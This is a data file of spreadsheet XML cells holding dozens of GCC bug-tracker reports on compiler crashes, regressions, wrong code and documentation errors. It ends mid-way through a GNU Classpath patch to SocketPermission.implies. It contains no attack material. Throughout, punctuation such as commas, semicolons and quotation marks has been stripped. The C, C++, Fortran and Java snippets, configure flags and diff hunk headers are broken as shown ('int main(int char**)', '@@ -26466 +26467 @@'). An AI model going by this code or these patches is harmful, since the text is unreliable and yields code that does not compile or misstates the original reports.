When the linker sees the R_MIPS_CALL16 it decides that a PLT entry should be generated for the symbol and thusly changes its object-modification behavior for *all* invocations of the function.  The R_MIPS_CALL16 relocs are then linked correctly but the R_MIPS_GOT16 are linked incorrectly.
This is just as likely a bug in the linker as it is in the compiler but gcc 4.0.0 (the only other version I have tested) doesn't have this problem.  It is more consistent and generates R_MIPS_CALL16 in both cases.  If this is not a bug in the compiler I'll report to binutils.</t>
  </si>
  <si>
    <t>GCC-28023</t>
  </si>
  <si>
    <t>documentation error max-inline-recursive-depth</t>
  </si>
  <si>
    <t>The default value of max-inline-recursive-depth is 8 in the implementation. The documentation differs there the default value is 450.</t>
  </si>
  <si>
    <t>Erwin.Unruh</t>
  </si>
  <si>
    <t>GCC-44577</t>
  </si>
  <si>
    <t>static local variables in class template methods are not optimized-away if not used</t>
  </si>
  <si>
    <t>IMO in the following test program the variable s within the class template may be optimized-away in every case. Although the variable is used as an argument for a function call it is omit-able due to the definition of function t1 as static inline with its empty body. If I use instead of a class template a function template this contained static local variable will be optimized-away as expected.
[mschulze@teeth tst]$ cat test.cc
static inline void t1(const char* s) {}
template 
struct class_template {
    class_template() {
        static const char s[]=class_template
        t1(s)
    }
}
template 
static inline void function_template() {
        static const char s[]=function_template
        t1(s)
    }
int main(int char**) {
    class_template t
    function_template()
    return 0
}
I compiled the program with
[mschulze@teeth tst]$ g++ -v
Using built-in specs.
Target: i586-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-languages=cc++objcobj-c++javafortranada --enable-java-awt=gtk --disable-dssi --enable-plugin --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-ppl --with-cloog --with-tune=generic --with-arch=i586 --build=i586-redhat-linux
Thread model: posix
gcc version 4.4.1 20090725 (Red Hat 4.4.1-2) (GCC)
and then I used the string program to list the contained strings.
[mschulze@teeth tst]$ strings t
/lib/ld-linux.so.2
libstdc++.so.6
__gmon_start__
_Jv_RegisterClasses
__gxx_personality_v0
libm.so.6
libgcc_s.so.1
libc.so.6
_IO_stdin_used
__libc_start_main
CXXABI_1.3
GLIBC_2.0
PTRhP
QVhD
[^_]
class_template
[mschulze@teeth tst]$
The class_template string is present but the function_template string not. If I omit the static keyword it will disappear too.
Thanks in advance
Michael</t>
  </si>
  <si>
    <t>mschulze</t>
  </si>
  <si>
    <t>GCC-70421</t>
  </si>
  <si>
    <t>[5/6 Regression] wrong code with v16si vector and useless cast at -O -mavx512f</t>
  </si>
  <si>
    <t>Created attachment 38106
reduced testcase
Output: (using emulation)
$ x86_64-pc-linux-gnu-gcc -O -mavx512f testcase.c
$ sde64 -- ./a.out 
00001010
Aborted
$ x86_64-pc-linux-gnu-gcc -v                     
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest/bin/x86_64-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-234469-checking-yes-rtl-df-nographite/bin/../libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-checking=yesrtldf --without-cloog --without-ppl --without-isl --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-234469-checking-yes-rtl-df-nographite
Thread model: posix
gcc version 6.0.0 20160324 (experimental) (GCC) 
Tested revisions:
trunk r234469 - FAIL
5-branch r234412 - FAIL
4_9-branch r234243 - OK</t>
  </si>
  <si>
    <t>GCC-66428</t>
  </si>
  <si>
    <t>[6 regression] FAIL: g++.dg/abi/aarch64_guard1.C  -std=gnu++98  scan-tree-dump original _ZGVZ3foovE1x &amp; 1</t>
  </si>
  <si>
    <t>$ gcc/xg++ -Bgcc/ ../gcc/testsuite/g++.dg/abi/aarch64_guard1.C -O -fdump-tree-original -S -o aarch64_guard1.s
$ grep _ZGVZ3foovE1x aarch64_guard1.C.003t.original
  if (&gt;)
      if (&gt;)
  TARGET_EXPR  x = bar () D.3169 = 1 __cxa_guard_release ( &gt;&gt;&gt;&gt;&gt;
0925e39e497b5f218c4979b49afbdabcd3828e88 is the first bad commit
commit 0925e39e497b5f218c4979b49afbdabcd3828e88
Author: ramana 
Date:   Thu Jun 4 09:19:51 2015 +0000
    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@224118 138bc75d-0d04-0410-961f-82ee72b054a4</t>
  </si>
  <si>
    <t>GCC-34291</t>
  </si>
  <si>
    <t>[4.3 Regression] Segfault in io/list_read.c handling of end conditions</t>
  </si>
  <si>
    <t>In next_char() of libgfortran/io/list_read.c dtp-&gt;u.p.line_buffer_enabled is not initialized properly and this may cause segfault while accessing dtp-&gt;u.p.line_buffer[dtp-&gt;u.p.item_count] even dtp-&gt;u.p.linebuffer is NULL.  I think it can be solved with initializing in namelist_read() as follows.
Tested with gcc version 4.3.0 20071129 (experimental) (GCC) on Mac OS X 10.4.11 intel.
Index: libgfortran/io/list_read.c
===================================================================
--- libgfortran/io/list_read.c  (revision 130508)
+++ libgfortran/io/list_read.c  (working copy)
@@ -26466 +26467 @@
   dtp-&gt;u.p.namelist_mode = 1
   dtp-&gt;u.p.input_complete = 0
   dtp-&gt;u.p.expanded_read = 0
+  dtp-&gt;u.p.line_buffer_enabled = 0
   dtp-&gt;u.p.eof_jump = 
   if (setjmp (eof_jump))</t>
  </si>
  <si>
    <t>GCC-59561</t>
  </si>
  <si>
    <t>[4.9 Regression] warning: iteration 4 invokes undefined behavior</t>
  </si>
  <si>
    <t>Found when working on PR 55207 ...
With the following modification:
Index: gcc/testsuite/gfortran.dg/inline_sum_bounds_check_1.f90
===================================================================
--- gcc/testsuite/gfortran.dg/inline_sum_bounds_check_1.f90	(revision 206100)
+++ gcc/testsuite/gfortran.dg/inline_sum_bounds_check_1.f90	(working copy)
@@ -37 +38 @@
       integer parameter :: nx = 3 ny = 4
-      integer :: i j too_big
+      integer :: i j
+      integer save :: too_big
       integer parameter dimension(nxny) :: p = &amp;
         reshape((/ (i*i i=1size(p)) /) shape(p))
so that this test case becomes:
! { dg-do run }
! { dg-options -fbounds-check }
      integer parameter :: nx = 3 ny = 4
      integer :: i j
      integer save :: too_big
      integer parameter dimension(nxny) :: p = &amp;
        reshape((/ (i*i i=1size(p)) /) shape(p))
      integer dimension(nxny) :: a
      integer dimension(:) allocatable :: b
      allocate(b(nx))
      a = p
      too_big = ny + 1
      b = sum(a(:1:too_big)2)
      end
! { dg-shouldfail outside of expected range }
trunk gives:
$ gfortran-4.9 inline_sum_bounds_check_1.f90 -O2
inline_sum_bounds_check_1.f90: In function â€˜MAIN__â€™:
inline_sum_bounds_check_1.f90:21:0: warning: iteration 4 invokes undefined behavior [-Waggressive-loop-optimizations]
       b = sum(a(:1:too_big)2)
 ^
inline_sum_bounds_check_1.f90:21:0: note: containing loop
inline_sum_bounds_check_1.f90: In function â€˜mainâ€™:
inline_sum_bounds_check_1.f90:21:0: warning: iteration 4 invokes undefined behavior [-Waggressive-loop-optimizations]
       b = sum(a(:1:too_big)2)
 ^
inline_sum_bounds_check_1.f90:21:0: note: containing loop
with -O2 and -O3 while 4.8 did not do that. Probably the warning is ok since the test case is supposed to trigger a runtime error (Index '5' of dimension 2 of array 'a' outside of expected range (4:1)).
However I see three possible problems:
1) The question is why it only happens with SAVE.
2) I don't understand why the warning has 'iteration 4'. Shouldn't iteration 5 be the problem?
3) The warning appears twice.</t>
  </si>
  <si>
    <t>GCC-67591</t>
  </si>
  <si>
    <t>ARM v8 Thumb IT blocks deprecated</t>
  </si>
  <si>
    <t>Conditional compare patterns in the arm backend have not been adjusted for the -mrestrict-it rules which leads to gas warning messages such as:
IT blocks containing 32-bit Thumb instructions are deprecated in ARMv8.
For instance it happens in libstdc++/testsuite/21_strings/basic_string/allocator/char/minimal.cc
when GCC is configured:
--target arm-none-linux-gnueabihf
--with-mode thumb
--with-cpu cortex-a57
--with-fpu crypto-neon-fp-armv8</t>
  </si>
  <si>
    <t>GCC-24888</t>
  </si>
  <si>
    <t>duplication of local variables after versioning/inlining</t>
  </si>
  <si>
    <t>For the testcase: /home/razya/mainline_new_3/gcc/gcc/testsuite/gcc.c-torture/execute/20021111-1.c when using fipa-cp a new vfersion is created
for aim_callhandler(). the static variable is copied twice into the unexpanded_var_list of the versioned function. 
Looking at this test even without enabling ipa-cp the local variables
multiplies after inlining.(as shown in the dump below)
For example :
in 20021111-1.c.t23.alias1:
aim_callhandler (sess conn family type)
{
  int D.1449
  int sess
  int conn
  short unsigned int family
  short unsigned int type
  static int i = 0
  int D.1457
  int D.1456
  int i.0
  int D.1458
  int D.1449
  int D.1435
  int sess
  int conn
  short unsigned int family
  short unsigned int type
  static int i = 0
  int D.1443
  int D.1442
  int i.0
  int D.1444
  int D.1435
  int D.1421
  int sess
  int conn
  short unsigned int family
  short unsigned int type
  static int i = 0
  int D.1429
  int D.1428
  int i.0
  int D.1430
  int D.1421
  int D.1407
  int sess
  int conn
  short unsigned int family
  short unsigned int type
  static int i = 0
  int D.1415
  int D.1414
  int i.0</t>
  </si>
  <si>
    <t>razya</t>
  </si>
  <si>
    <t>GCC-7898</t>
  </si>
  <si>
    <t>[Sparc] readdir_r gives bad results with gcc-3.1 and 3.2</t>
  </si>
  <si>
    <t xml:space="preserve">	Note that this was built with gas and gld from binutils 2.12.1
	When migrating from gcc-2.95.1 to gcc-3.1 and 3.2 I notice that readdir_r has gone haywire.
	This may have something to do with fixincludes but I can't quite tell.  
        As you may know the solaris include file for dirent.h is a mess so I'm compiling with 
        CPPFLAGS += -D_POSIX_C_SOURCE=200106L
        CPPFLAGS += -D_FILE_OFFSET_BITS=64
	which should make things as POSIX as possible.
	Basically it looks like readdir_r is overwriting the stack
        and other nasty things in 3.2 and it was well-behaved with gcc-2.95.1
Release:
3.2
Environment:
System: SunOS xxx.yyy.zzz.com 5.6 Generic_105181-30 sun4u sparc SUNWUltra-Enterprise
Architecture: sun4
host: sparc-sun-solaris2.6
build: sparc-sun-solaris2.6
target: sparc-sun-solaris2.6
configured with: ../gcc-3.2/configure --prefix=/opt/gcc-3.2 --with-gnu-as --with-as=/opt/bin/as --with-gnu-ld --with-ld=/opt/bin/ld
How-To-Repeat:
	Enclosed is a makefile and c source to compare the two compilers.  I'm also including the preprocessor output from both.
### Here are the results:
$ make test-all
make[1]: Entering directory `/home/sadind/tmp/sadind/test-readdir_r'
rm -f test-readdir *.o
make[1]: Leaving directory `/home/sadind/tmp/sadind/test-readdir_r'
make[1]: Entering directory `/home/sadind/tmp/sadind/test-readdir_r'
COMPILER IS /opt/gcc-2.95.1/bin/gcc
make run
make[2]: Entering directory `/home/sadind/tmp/sadind/test-readdir_r'
/opt/gcc-2.95.1/bin/gcc  -D_POSIX_C_SOURCE=200106L -D_FILE_OFFSET_BITS=64 -g  -c -o test-readdir.o test-readdir.c
/opt/gcc-2.95.1/bin/gcc test-readdir.o -o test-readdir
./test-readdir .
&lt;count is 0
Unformatted:
 --ELM1031858850-3469-0_
 Content-Transfer-Encoding: 7bit
 Content-Type: text/plain charset=US-ASCII
 &gt;count is 0
 result:0 file: .
 entryPointer is efffdf58
 &lt;count is 1
 &gt;count is 1
 result:0 file: ..
 entryPointer is efffdf58
 &lt;count is 2
 &gt;count is 2
 result:0 file: .svn
 entryPointer is efffdf58
 &lt;count is 3
 &gt;count is 3
 result:0 file: test-readdir.c
 entryPointer is efffdf58
 &lt;count is 4
 &gt;count is 4
 result:0 file: Makefile
 entryPointer is efffdf58
 &lt;count is 5
 &gt;count is 5
 result:0 file: test-readdir.o
 entryPointer is efffdf58
 &lt;count is 6
 &gt;count is 6
 result:0 file: test-readdir
 entryPointer is efffdf58
 &lt;count is 7
 &gt;count is 7
 result:-1 file: test-readdir
 entryPointer is 0
 returned nonzero.
 found 7 files
 make[2]: Leaving directory `/home/sadind/tmp/sadind/test-readdir_r'
 make[1]: Leaving directory `/home/sadind/tmp/sadind/test-readdir_r'
 make[1]: Entering directory `/home/sadind/tmp/sadind/test-readdir_r'
 rm -f test-readdir *.o
 make[1]: Leaving directory `/home/sadind/tmp/sadind/test-readdir_r'
 make[1]: Entering directory `/home/sadind/tmp/sadind/test-readdir_r'
 COMPILER IS /opt/gcc-3.2/bin/gcc
 make run
 make[2]: Entering directory `/home/sadind/tmp/sadind/test-readdir_r'
 /opt/gcc-3.2/bin/gcc  -D_POSIX_C_SOURCE=200106L -D_FILE_OFFSET_BITS=64 -g  -c -o test-readdir.o test-readdir.c
 /opt/gcc-3.2/bin/gcc test-readdir.o -o test-readdir
 ./test-readdir .
 &lt;count is 0
 &gt;count is 0
 result:0 file: .
 entryPointer is efffdf88
 &lt;count is 1
 &gt;count is 1
 result:0 file: ..
 entryPointer is efffdf88
 &lt;count is 2
 &gt;count is 2
 result:0 file: .svn
 entryPointer is efffdf88
 &lt;count is 3
 &gt;count is 1769090659
 result:0 file: test-readdir.c
 entryPointer is efffdf88
 badness.  count is too large
 found 1769090659 files
 make[2]: Leaving directory `/home/sadind/tmp/sadind/test-readdir_r'
 make[1]: Leaving directory `/home/sadind/tmp/sadind/test-readdir_r'</t>
  </si>
  <si>
    <t>sadinoff</t>
  </si>
  <si>
    <t>GCC-5144</t>
  </si>
  <si>
    <t>ICE on const_hash</t>
  </si>
  <si>
    <t>viffer@linux:~/cpp.21days &gt; c++ lst14.11.cpp -o example
lst14.11.cpp: In function `int main(...)':
lst14.11.cpp:30: Internal compiler error in `const_hash' at varasm.c:2372
Please submit a full bug report.
See  for instructions.  
attempting to compile program 14.11 in Teach Yourself C++ Programming in 21 Days by
Jesse Liberty.  Sams Publishing
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Suse Linux ver 7.1
pentium 300Mhz 96M ram</t>
  </si>
  <si>
    <t>gcurran</t>
  </si>
  <si>
    <t>GCC-83066</t>
  </si>
  <si>
    <t>[8 regression] 26_numerics/gcd/gcd_neg.cc fails since r254736</t>
  </si>
  <si>
    <t>Hi
Since r254736 I have noticed that gcd_neg.cc now fails on:
    26_numerics/gcd/gcd_neg.cc  (test for errors line 30)
    26_numerics/gcd/gcd_neg.cc  (test for errors line 138)
    26_numerics/gcd/gcd_neg.cc  (test for errors line 36)
    26_numerics/gcd/gcd_neg.cc  (test for errors line 40)</t>
  </si>
  <si>
    <t>GCC-1651</t>
  </si>
  <si>
    <t>Large number of irix6.5/-mabi=64 testsuite failures coincident with  V3 abi changes</t>
  </si>
  <si>
    <t>There was a significant increase in g++ testsuite failures with -mabi=64 between 2.97 20001113 and 2.97 20001119.  Failures are still present in current snapshots. The changes are not observed in the default -n32 abi.
This may be a result of the change to the V3 ABI on 18 Nov 2000.
Test results are archived at:
http://gcc.gnu.org/ml/gcc-testresults/2000-11/msg00117.html
http://gcc.gnu.org/ml/gcc-testresults/2000-11/msg00171.html
Release:
2.97 20001120 (experimental) onwards
Environment:
mips-sgi-irix6.5
How-To-Repeat:
Compile and run any failing testsuite case with -mabi=64 for example g++.brendan/eh1.C</t>
  </si>
  <si>
    <t>GCC-14665</t>
  </si>
  <si>
    <t>gnatmake invokes wrong cross tools</t>
  </si>
  <si>
    <t>When using a target name with versioning such as sparc-rtems4.7 the 
current code in osint.adb:Find_Program_Name strips off the trailing 
digits.  Discussions on the gcc mailing list start at this thread:
http://gcc.gnu.org/ml/gcc/2004-03/msg00968.html
In general across various hosts the basename portion of the full path
is something like this format after being converted to lower case:
XXX[.exe][[.][0-9]+
where XXX is the name of the tool.  Under VMS you get .exe followed
by a  or . and a version between 1 and 32767.</t>
  </si>
  <si>
    <t>GCC-1049</t>
  </si>
  <si>
    <t>Compiler egcs-2.91.66 crashes on template class fcn. defn.</t>
  </si>
  <si>
    <t>[root@inspb z]# g++ -v -save-temps -c misclib.cpp
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
 /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/cpp -lang-c++ -v -undef -D__GNUC__=2 -D__GNUG__=2 -D__cplusplus -D__GNUC_MINOR__=91 -D__ELF__ -Dunix -Di386 -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__i386__ -D__linux__ -D__unix -D__i386 -D__linux -Asystem(posix) -D__EXCEPTIONS -Asystem(unix) -Acpu(i386) -Amachine(i386) -Di386
-D__i386 -D__i386__ -D__tune_i386__ misclib.cpp misclib.ii
GNU CPP version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-2
 /usr/i386-redhat-linux/include
 /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/cc1plus misclib.ii -quiet -dumpbase
misclib.cc -version -o misclib.s
GNU C++ version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) (i386-redhat-linux)
compiled by GNU C version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release).
misclib.cpp:45: Internal compiler error.
misclib.cpp:45: Please submit a full bug report to `egcs-bugs@egcs.cygnus.com'.
misclib.cpp:45: See  for details.
[root@inspb z]#
Release:
egcs-2.91.66 also 2.95.2 also 3.0 20010218.
Environment:
Redhat 6.2 egcs-2.91.66.
How-To-Repeat:
With this ii thing I don't know.  Just g++ it probably.</t>
  </si>
  <si>
    <t>robert.c.armstrong</t>
  </si>
  <si>
    <t>GCC-7144</t>
  </si>
  <si>
    <t>Typo in Makefile-comment</t>
  </si>
  <si>
    <t xml:space="preserve">	Nothing to say: there ain't no 'r' in gnatmake
Release:
3.2 20020604 (experimental)
Environment:
System: Linux drcomp 2.4.18 #13 Sun Mar 3 13:22:15 CET 2002 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --enable-threads --enable-languages=cc++ada
How-To-Repeat:
	less gcc/gcc/ada/Makefile.in</t>
  </si>
  <si>
    <t>adi</t>
  </si>
  <si>
    <t>GCC-26562</t>
  </si>
  <si>
    <t>[4.0 Regression] unrecognizable insn with huge symbol offset with -fPIC</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/349268]
gcc version 4.0.2 (Debian 4.0.2-2)
falk@pergolesi:~% cat test.c
extern int x[]
static int **STACK
static void get_block() {
    while (1)
        STACK[0] = x + (1L &lt;&lt; 48)
}
falk@pergolesi:~% gcc -c test.c
falk@pergolesi:~% gcc -c test.c -O
falk@pergolesi:~% gcc -c test.c -O -fPIC
test.c: In function 'get_block':
test.c:7: error: unrecognizable insn:
(insn 34 33 30 0 (set (reg/f:DI 59)
        (plus:DI (reg:DI 61)
            (const_int 1125899906842624 [0x4000000000000]))) -1 (insn_list:REG_DEP_TRUE 33 (nil))
    (expr_list:REG_DEAD (reg:DI 61)
        (expr_list:REG_EQUAL (const:DI (plus:DI (symbol_ref:DI (x) [flags 0x40] )
                    (const_int 1125899906842624 [0x4000000000000])))
            (nil))))
test.c:7: internal compiler error: in extract_insn at recog.c:2020
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-67534</t>
  </si>
  <si>
    <t>libgfortran.h sanitizer complains on left shift of ~0 runtime error: left shift of negative value -1</t>
  </si>
  <si>
    <t>The sanitizer complains on libgfortran.h:408
((~((index_type) 0) &gt;&gt; GFC_DTYPE_SIZE_SHIFT) &lt;&lt; GFC_DTYPE_SIZE_SHIFT)
issuing
runtime error: left shift of negative value -1
because 0 is int. I believe it must be 0u to avoid undefined behaviour as in
((~((index_type) 0u) &gt;&gt; GFC_DTYPE_SIZE_SHIFT) &lt;&lt; GFC_DTYPE_SIZE_SHIFT)
Target: x86_64-unknown-linux-gnu</t>
  </si>
  <si>
    <t>GCC-3082</t>
  </si>
  <si>
    <t>C++ EH is broken for multithreaded programs</t>
  </si>
  <si>
    <t>Memory used to hold state for EH processing is shared
across threads due to a configuration error introduced
when C++ EH code was moved from gcc/libgcc2.c to
libstdc++-v3/libsupc++.
This bug has been reported a few times on gcc-bugs.
The attached test case was taken from (cleaned up
only slightly):
http://gcc.gnu.org/ml/gcc-bugs/2001-05/msg00855.html
dave@hiauly1.hia.nrc.ca also reported this problem with
an initial patch to libstdc++-v3.
Release:
unknown
Environment:
*-*-linux *-*-freebsd others
How-To-Repeat:
The lack of using thread-specific memory produces
non-deterministic failures.  However the non-portable
(to non-POSIX hosts) code attached will surely crash
after some amount of time.</t>
  </si>
  <si>
    <t>GCC-3990</t>
  </si>
  <si>
    <t>logical or | within inline assembly cuts off assembly code</t>
  </si>
  <si>
    <t>/* GCC 3.0 this to assembly and behold the eaten code. */
/* (GCC 2.95.2 is not at all voracious with the '|' and */
/* all assembly that follows.) */
/* CodeSourcery's Online Test Compilation ( 2001-06-26) */
/* reveals that gcc 3.0.1 still consumes the code */
int
test()
{
  int o
  __asm__
    (
     movl $1 %%eax\n\t
     sall $(1 | 2) %%eax\n\t
     movl %%eax %0\n\t
     : =a (o)
     )
  return(o)
}
Release:
gcc version 3.0 (Debian)</t>
  </si>
  <si>
    <t>jodaman</t>
  </si>
  <si>
    <t>GCC-42425</t>
  </si>
  <si>
    <t>ICE declaring local class</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE on trunk when compiled
with -flto -g:
==========================
struct A
{
  virtual ~A()
}
void foo()
{
  struct B : A {}
  B b
}
==========================
bug.cc: In member function 'B':
bug.cc:8:16: internal compiler error: tree check: expected class 'type' have 'declaration' (function_decl) in gen_type_die_with_usage at dwarf2out.c:18739
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-9136</t>
  </si>
  <si>
    <t>Compiler bomb on spec file with Elaborate_Body</t>
  </si>
  <si>
    <t>The following package spec bombs the compiler instead
of issuing a warning:
with Interfaces
package Nomsg is
   pragma Elaborate_Body
   type Size_T is new Interfaces.Unsigned_32
end Nomsg
gcc -c nomsg.ads
No code generated for file nomsg.ads (package spec)
gcc.exe: Internal error: Aborted (program gnat1)
Please submit a full bug report.
See  for instructions.
gnatmake: nomsg.ads compilation error
Release:
3.3 prerelease 20020102 mingw
Environment:
mingw (runtime 2.3)
How-To-Repeat:
run 'make.bat' in archive</t>
  </si>
  <si>
    <t>jvandyk</t>
  </si>
  <si>
    <t>GCC-5817</t>
  </si>
  <si>
    <t>[parser] Duplicate typedef causes ICE</t>
  </si>
  <si>
    <t>The following illegal source r.C causes an ICE. This is an regression
wrt. gcc 2.95.2 and gcc 3.0.
Release:
3.1 20020302 (prerelease)
Environment:
System: Linux kiste 2.4.17 #7 Thu Jan 3 17:21:51 CET 2002 i686 unknown
Architecture: i686
SuSE 7.3
glibc 2.2.4 + patches
GNU ld version 2.11.93.0.2 20020207
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads --enable-languages=cc++f77objc
How-To-Repeat:
source code r.C
template &gt;
struct A
{
  typedef T a
  typedef T b
}
g++ -v -c r.C -W -Wall -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads --enable-languages=cc++f77objc
Thread model: posix
gcc version 3.1 20020302 (prerelease)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ r.C -W -Wall r.ii
GNU CPP version 3.1 20020302 (prerelease) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -fpreprocessed r.ii -quiet -dumpbase r.C -W -Wall -version -o r.s
GNU CPP version 3.1 20020302 (prerelease) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20020302 (prerelease) (i686-pc-linux-gnu)
 compiled by GNU C version 3.1 20020302 (prerelease).
r.C:1: parse error before `&lt;' token
r.C:5: template declaration of `typedef T b'
r.C:5: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
preprocessed source code r.ii
# 1 r.C
# 1 
# 1 
# 1 r.C
template &gt;
struct A
{
  typedef T a
  typedef T b
}</t>
  </si>
  <si>
    <t>CLASSPATH-24708</t>
  </si>
  <si>
    <t>SocketPermission</t>
  </si>
  <si>
    <t>Under the JNode project we incountered a bug in the SocketPermission implies method. I have fixed the problem and attached the changes.
--- SocketPermission_r1.2.java	2005-11-07 14:54:12.267024200 +0100
+++ SocketPermission.java	2005-10-31 16:00:00.118982400 +0100
@@ -1106 +11014 @@
 {
     static final long serialVersionUID = -7204263841984476862L
+// @classpath-bugfix 31/10/2005 Martin Husted Hartvig (hagar@jnode.org) :
+// rewritten implies method
+    static protected final String wildcard = *
+    static protected final String ports = :
+    static protected final String portDelimitor = -
+    static protected final String empty = 
+// @classpath-bugfix-end
+
 // FIXME: Needs serialization work including readObject/writeObject methods.
     /**
@@ -257152 +265171 @@
    * @return true if the Permission is implied by
    * this object false otherwise.
      */
-  public boolean implies(Permission perm)
-  {
-    SocketPermission p
-        // First make sure we are the right object type
-    if (perm instanceof SocketPermission)
-      p = (SocketPermission) perm
-    else
-            return false
+    public boolean implies(Permission perm)
+    {
+// @classpath-bugfix 31/10/2005 Martin Husted Hartvig (hagar@jnode.org) :
+// rewritten implies method
+      SocketPermission p
+
+      // First make sure we are the right object type
+      if (perm instanceof SocketPermission)
+        p = (SocketPermission) perm
+      else
+        return false
+
+      // Next check the actions
+      String ourlist = getActions()
+      String theirlist = p.getActions()
+
+      if (ourlist.indexOf(theirlist) == -1)
+        return false
+
+      if (hostport.equals(empty) &amp;&amp; p.hostport.equals(empty))
+        return true
+
+      // Now check ports
+      int ourfirstport = 0
+
+      // Now check ports
+      int ourlastport = 0
-        // Next check the actions
-    String ourlist = getActions()
-    String theirlist = p.getActions()
+      // Now check ports
+      int theirfirstport = 0
-    if (! ourlist.startsWith(theirlist))
-            return false
+      // Now check ports
+      int theirlastport = 0
-        // Now check ports
-    int ourfirstport = 0
+      // Finally we can check the hosts
+      String ourhost
-    // Now check ports
-    int ourlastport = 0
+      // Finally we can check the hosts
+      String theirhost
-    // Now check ports
-    int theirfirstport = 0
+      String range
-    // Now check ports
-    int theirlastport = 0
+      int portsIndex
+      int portDelimitorIndex
-    // Get ours
-    if (hostport.indexOf(:) == -1)
+      // Get ours
+      portsIndex = hostport.indexOf(ports)
+      if (portsIndex == -1)
       {
-	ourfirstport = 0
-	ourlastport = 65535
+        ourlastport = 65535
+        ourhost = hostport
       }
-    else
+      else
       {
-	// FIXME:  Needs bulletproofing.
-	// This will dump if hostport if all sorts of bad data was passed to
-	// the constructor
-	String range = hostport.substring(hostport.indexOf(:) + 1)
-	if (range.startsWith(-))
-	  ourfirstport = 0
-	else if (range.indexOf(-) == -1)
-	  ourfirstport = Integer.parseInt(range)
-	else
-	  ourfirstport =
-	    Integer.parseInt(range.substring(0 range.indexOf(-)))
-
-	if (range.endsWith(-))
-	  ourlastport = 65535
-	else if (range.indexOf(-) == -1)
-	  ourlastport = Integer.parseInt(range)
-	else
-	  ourlastport =
-	    Integer.parseInt(range.substring(range.indexOf(-) + 1
-	                                     range.length()))
+        // FIXME:  Needs bulletproofing.
+        // This will dump if hostport if all sorts of bad data was passed to
+        // the constructor
+        range = hostport.substring(portsIndex + 1)
+        portDelimitorIndex = range.indexOf(portDelimitor)
+
+        if (portDelimitorIndex == 0)
+        {
+          ourfirstport = 0
+        }
+        else if (portDelimitorIndex == -1)
+        {
+          ourfirstport = Integer.parseInt(range)
+          ourlastport = ourfirstport
+        }
+        else
+          ourfirstport = Integer.parseInt(range.substring(0 portDelimitorIndex))
+
+
+        if (range.endsWith(portDelimitor))
+          ourlastport = 65535
+        else
+          ourlastport = Integer.parseInt(range.substring(portDelimitorIndex + 1 range.length()))
+
+        ourhost = hostport.substring(0 portsIndex)
       }
-    // Get theirs
-    if (p.hostport.indexOf(:) == -1)
+      // Get theirs
+      portsIndex = p.hostport.indexOf(ports)
+      if (portsIndex == -1)
       {
-	theirfirstport = 0
-	ourlastport = 65535
+        theirlastport = 65535
+        theirhost = p.hostport
       }
-    else
+      else
       {
-	// This will dump if hostport if all sorts of bad data was passed to
-	// the constructor
-	String range = p.hostport.substring(hostport.indexOf(:) + 1)
-	if (range.startsWith(-))
-	  theirfirstport = 0
-	else if (range.indexOf(-) == -1)
-	  theirfirstport = Integer.parseInt(range)
